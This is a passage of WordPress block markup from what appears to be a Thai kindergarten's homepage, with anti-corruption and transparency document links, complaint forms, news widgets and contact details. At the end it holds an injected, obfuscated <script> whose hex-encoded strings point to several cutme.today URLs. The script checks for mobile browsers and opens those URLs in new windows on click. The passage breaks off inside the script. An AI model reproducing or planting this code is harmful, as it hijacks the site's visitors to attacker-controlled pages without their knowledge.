900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 